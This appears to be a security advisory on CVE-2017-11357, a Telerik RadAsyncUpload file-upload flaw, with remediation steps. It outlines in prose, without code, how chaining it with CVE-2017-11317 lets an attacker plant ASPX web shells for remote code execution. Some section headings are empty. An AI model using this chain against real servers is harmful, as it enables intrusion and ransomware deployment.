CVE-2017-11357

What Is Telerik RadAsyncUpload?

Telerik UI for ASP.NET AJAX is a commercial .NET web component library used by thousands of enterprise applications globally. The RadAsyncUpload handler provides asynchronous file upload functionality. In the vulnerable versions, the upload handler stored temporary uploaded files in a location accessible via direct object reference (IDOR) — without properly validating the file type or restricting access to the temporary storage path. Combined with the weak encryption bypass in CVE-2017-11317, an attacker can upload arbitrary files to locations of their choice, including web-accessible directories where ASPX web shells execute directly.

Overview

CVE-2017-11357 is an insecure direct object reference / unrestricted file upload vulnerability in the Telerik RadAsyncUpload component. The handler allows file uploads to a location specified in the (cryptographically signed) request metadata — when the signature can be bypassed using the weak encryption in CVE-2017-11317, an attacker can upload arbitrary file types (including .aspx web shells) to web-accessible locations on the server. Together, CVE-2017-11317 + CVE-2017-11357 form a complete unauthenticated RCE chain: break the encryption to forge an upload request, then direct the uploaded file to a web-accessible path. Patched in Telerik UI for ASP.NET AJAX R3 2017 SP1 (2017.3.1020). The ransomwareUse: true flag reflects confirmed use in ransomware intrusions and nation-state attacks against US government targets. CISA added CVE-2017-11357 to the KEV catalog in January 2023.

Affected Versions

Technical Details

Root Cause: Unrestricted File Upload via IDOR in Upload Handler

CVE-2017-11357 is an unrestricted file upload vulnerability (CWE-434) in the Telerik RadAsyncUpload handler. The handler processes chunked file uploads and stores temporary files on the server. The upload destination path and filename are specified in encrypted metadata in the upload request — an IDOR condition exists because the handler follows this path reference without independently validating that the destination is within a safe upload directory.

Complete exploit chain with CVE-2017-11317:

1. Stage 1 (CVE-2017-11317): Attacker exploits weak encryption to forge a valid RadAsyncUpload request with arbitrary metadata
2. Stage 2 (CVE-2017-11357): The forged request specifies an ASPX web shell as the upload file type and a web-accessible directory as the destination path
3. Web shell access: The handler stores the uploaded ASPX file in the specified web-accessible location
4. Remote code execution: The attacker accesses the uploaded web shell via HTTP, obtaining arbitrary code execution in the IIS application pool user context

Why ransomware actors use this chain:

• Initial access via web shell is stealthy — it mimics normal web traffic
• Web shells provide persistent interactive access for reconnaissance
• From the web shell, attackers escalate to domain admin via lateral movement tools
• Ransomware is deployed across the domain after establishing sufficient access

Attack Characteristics

Discovery

Discovered and reported to Progress/Telerik, resulting in the October 2017 patch release.

Exploitation Context

• CISA alert on federal targeting: CISA published an alert (AA21-200B) specifically warning that Telerik vulnerabilities (including CVE-2017-11317 and CVE-2017-11357) were being exploited against US federal agencies — multiple incidents where Chinese state-sponsored actors and criminal ransomware operators compromised federal web applications via these CVEs
• Ransomware delivery chain: Ransomware groups used the Telerik chain as initial access to target enterprise .NET web applications, dropping web shells for persistent access, then moving laterally to domain controllers before encrypting the environment
• Persistence via web shells: The web shell upload provides persistent access even if network defenses improve post-initial-compromise; ASPX web shells embedded in the web root survived patch cycles because they were not cleaned up alongside OS/application patching
• Escalating Telerik vulnerability family: CVE-2017-11357 was eventually superseded in severity by CVE-2019-18935 (a .NET deserialization vulnerability in the same RadAsyncUpload component, CVSS 9.8), which achieves RCE without needing to upload a file at all; organizations that patched CVE-2017-11317/11357 but not CVE-2019-18935 remained vulnerable
• CISA KEV (2023): Added January 2023 alongside a batch of Telerik-related vulnerabilities confirmed in active exploitation against US government networks

Remediation

1. Apply all three Telerik patches — upgrade to versions that address CVE-2017-11317 (2017.2.711+), CVE-2017-11357 (2017.3.1020+), and CVE-2019-18935 (2020.1.114+); all three must be patched together.

2. Scan for web shells — immediately scan web application directories for recently created or modified .aspx, .ashx, .asmx, and .aspx.cs files; compare against known-good file inventory from source control or deployment artifacts.

3. Configure explicit MachineKey — set a cryptographically strong MachineKey in web.config to prevent the encryption bypass prerequisite for this exploit chain.

4. Disable RadAsyncUpload if not needed — remove the upload handler (Telerik.Web.UI.WebResource.axd) from web.config if file upload functionality is not required.

5. Implement file type validation — at the web application firewall level, block upload requests containing .aspx, .ashx, or other executable file extensions; legitimate file uploads should never include server-side executable content.